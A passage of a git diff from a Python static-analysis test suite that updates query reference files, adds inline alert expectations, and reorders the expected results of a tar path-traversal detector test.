-Statements/UnreachableCode.ql +query: Statements/UnreachableCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Statements/unreachable_suppressed/UnreachableCode.qlref b/python/ql/test/3/query-tests/Statements/unreachable_suppressed/UnreachableCode.qlref index 5b7891f0026a..b95a67d24949 100644 --- a/python/ql/test/3/query-tests/Statements/unreachable_suppressed/UnreachableCode.qlref +++ b/python/ql/test/3/query-tests/Statements/unreachable_suppressed/UnreachableCode.qlref @@ -1 +1,2 @@ -Statements/UnreachableCode.ql +query: Statements/UnreachableCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Summary/LinesOfCode.qlref b/python/ql/test/3/query-tests/Summary/LinesOfCode.qlref index b60eb7917224..d22b10044239 100644 --- a/python/ql/test/3/query-tests/Summary/LinesOfCode.qlref +++ b/python/ql/test/3/query-tests/Summary/LinesOfCode.qlref @@ -1 +1 @@ -Summary/LinesOfCode.ql +query: Summary/LinesOfCode.ql diff --git a/python/ql/test/3/query-tests/Summary/LinesOfUserCode.qlref b/python/ql/test/3/query-tests/Summary/LinesOfUserCode.qlref index baaa947e6afa..99a6d1324943 100644 --- a/python/ql/test/3/query-tests/Summary/LinesOfUserCode.qlref +++ b/python/ql/test/3/query-tests/Summary/LinesOfUserCode.qlref @@ -1 +1 @@ -Summary/LinesOfUserCode.ql +query: Summary/LinesOfUserCode.ql diff --git a/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.py b/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.py index fc1a03f6e1c9..84a717c03143 100644 --- a/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.py +++ b/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.py @@ -1,6 +1,6 @@ -__all__ = [ "x", "y", "z", "module", "w" ] +__all__ = [ "x", "y", "z", "module", "w" ] # $ Alert[py/undefined-export] x = 1 if 0: diff --git a/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.qlref b/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.qlref index 3e5d31e47488..d964148077e5 100644 --- a/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.qlref +++ b/python/ql/test/3/query-tests/Variables/undefined/UndefinedExport.qlref @@ -1 +1,2 @@ -Variables/UndefinedExport.ql +query: Variables/UndefinedExport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Variables/undefined/UninitializedLocal.qlref b/python/ql/test/3/query-tests/Variables/undefined/UninitializedLocal.qlref index f2d0e603554a..90233ce61888 100644 --- a/python/ql/test/3/query-tests/Variables/undefined/UninitializedLocal.qlref +++ b/python/ql/test/3/query-tests/Variables/undefined/UninitializedLocal.qlref @@ -1 +1,2 @@ -Variables/UninitializedLocal.ql +query: Variables/UninitializedLocal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Variables/undefined/enum_convert.py b/python/ql/test/3/query-tests/Variables/undefined/enum_convert.py index 58979d0b4c9c..db6b89b8f7f4 100644 --- a/python/ql/test/3/query-tests/Variables/undefined/enum_convert.py +++ b/python/ql/test/3/query-tests/Variables/undefined/enum_convert.py @@ -5,4 +5,4 @@ __name__, lambda C: C.isupper() and C.startswith('AF_')) -__all__ = [ "Maybe", "Maybe_not" ] +__all__ = [ "Maybe", "Maybe_not" ] # $ Alert[py/undefined-export] diff --git a/python/ql/test/3/query-tests/Variables/undefined/package/__init__.py b/python/ql/test/3/query-tests/Variables/undefined/package/__init__.py index 85f1f2ac24f4..d0f80d5e8909 100644 --- a/python/ql/test/3/query-tests/Variables/undefined/package/__init__.py +++ b/python/ql/test/3/query-tests/Variables/undefined/package/__init__.py @@ -1 +1 @@ -__all__ = [ "module", "not_exists" ] \ No newline at end of file +__all__ = [ "module", "not_exists" ] # $ Alert[py/undefined-export] \ No newline at end of file diff --git a/python/ql/test/experimental/library-tests/CallGraph-implicit-init/InlineCallGraphTest.qlref b/python/ql/test/experimental/library-tests/CallGraph-implicit-init/InlineCallGraphTest.qlref index 25117a4582bd..e7b837c89003 100644 --- a/python/ql/test/experimental/library-tests/CallGraph-implicit-init/InlineCallGraphTest.qlref +++ b/python/ql/test/experimental/library-tests/CallGraph-implicit-init/InlineCallGraphTest.qlref @@ -1 +1 @@ -../CallGraph/InlineCallGraphTest.ql +query: ../CallGraph/InlineCallGraphTest.ql diff --git a/python/ql/test/experimental/library-tests/CallGraph-imports/InlineCallGraphTest.qlref b/python/ql/test/experimental/library-tests/CallGraph-imports/InlineCallGraphTest.qlref index 25117a4582bd..e7b837c89003 100644 --- a/python/ql/test/experimental/library-tests/CallGraph-imports/InlineCallGraphTest.qlref +++ b/python/ql/test/experimental/library-tests/CallGraph-imports/InlineCallGraphTest.qlref @@ -1 +1 @@ -../CallGraph/InlineCallGraphTest.ql +query: ../CallGraph/InlineCallGraphTest.ql diff --git a/python/ql/test/experimental/library-tests/CallGraph-type-annotations/InlineCallGraphTest.qlref b/python/ql/test/experimental/library-tests/CallGraph-type-annotations/InlineCallGraphTest.qlref index 25117a4582bd..e7b837c89003 100644 --- a/python/ql/test/experimental/library-tests/CallGraph-type-annotations/InlineCallGraphTest.qlref +++ b/python/ql/test/experimental/library-tests/CallGraph-type-annotations/InlineCallGraphTest.qlref @@ -1 +1 @@ -../CallGraph/InlineCallGraphTest.ql +query: ../CallGraph/InlineCallGraphTest.ql diff --git a/python/ql/test/experimental/library-tests/FindSubclass/Find.qlref b/python/ql/test/experimental/library-tests/FindSubclass/Find.qlref index f8bd638be1ab..59bdb1462def 100644 --- a/python/ql/test/experimental/library-tests/FindSubclass/Find.qlref +++ b/python/ql/test/experimental/library-tests/FindSubclass/Find.qlref @@ -1 +1 @@ -meta/ClassHierarchy/Find.ql +query: meta/ClassHierarchy/Find.ql diff --git a/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.py b/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.py index c07bdb57234a..46633a009f72 100644 --- a/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.py +++ b/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.py @@ -1,5 +1,5 @@ # BAD, do not start class or interface name with lowercase letter -class badName: +class badName: # $ Alert def hello(self): print("hello") diff --git a/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.qlref b/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.qlref index 7ed945d782c4..b5b73c19bf81 100644 --- a/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.qlref +++ b/python/ql/test/experimental/query-tests/Classes/Naming/NamingConventionsClasses.qlref @@ -1 +1,2 @@ -experimental/Classes/NamingConventionsClasses.ql \ No newline at end of file +query: experimental/Classes/NamingConventionsClasses.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.py b/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.py index fb3e89ab8e92..5923ce5919f3 100644 --- a/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.py +++ b/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.py @@ -1,7 +1,7 @@ class Test: # BAD, do not start function name with uppercase letter - def HelloWorld(self): + def HelloWorld(self): # $ Alert print("hello world") # GOOD, function name starts with lowercase letter diff --git a/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.qlref b/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.qlref index 0204694de0a3..21d3e5fe1358 100644 --- a/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.qlref +++ b/python/ql/test/experimental/query-tests/Functions/general/NamingConventionsFunctions.qlref @@ -1 +1,2 @@ -experimental/Functions/NamingConventionsFunctions.ql \ No newline at end of file +query: experimental/Functions/NamingConventionsFunctions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected index 6de2b27bfa76..6cceacd031f6 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected @@ -1,3 +1,33 @@ +#select +| TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | ControlFlowNode for result | +| TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | ControlFlowNode for members_filter1() | +| TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | +| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | +| TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:231:6:231:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:236:44:236:50 | ControlFlowNode for members | ControlFlowNode for members | +| TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:254:1:254:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | +| TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:258:6:258:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:261:25:261:29 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:264:6:264:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:268:21:268:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:271:6:271:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:274:25:274:29 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:276:6:276:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:280:21:280:25 | ControlFlowNode for entry | ControlFlowNode for entry | +| TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:283:6:283:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:284:5:284:7 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:287:7:287:28 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:288:49:288:51 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:292:7:292:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:293:1:293:3 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:300:6:300:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:301:49:301:51 | ControlFlowNode for tar | ControlFlowNode for tar | +| TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:304:7:304:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:310:49:310:54 | ControlFlowNode for result | ControlFlowNode for result | +| TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:316:1:316:46 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | edges | TarSlipImprov.py:15:1:15:3 | ControlFlowNode for tar | TarSlipImprov.py:17:5:17:10 | ControlFlowNode for member | provenance | | | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:15:1:15:3 | ControlFlowNode for tar | provenance | | @@ -223,33 +253,3 @@ nodes subpaths | TarSlipImprov.py:39:65:39:67 | ControlFlowNode for tar | TarSlipImprov.py:26:21:26:27 | ControlFlowNode for tarfile | TarSlipImprov.py:36:12:36:17 | ControlFlowNode for result | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | | TarSlipImprov.py:39:65:39:67 | ControlFlowNode for tar | TarSlipImprov.py:26:21:26:27 | ControlFlowNode for tarfile | TarSlipImprov.py:36:12:36:17 | ControlFlowNode for result [List element] | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | -#select -| TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | ControlFlowNode for result | -| TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | ControlFlowNode for members_filter1() | -| TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | -| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | -| TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| 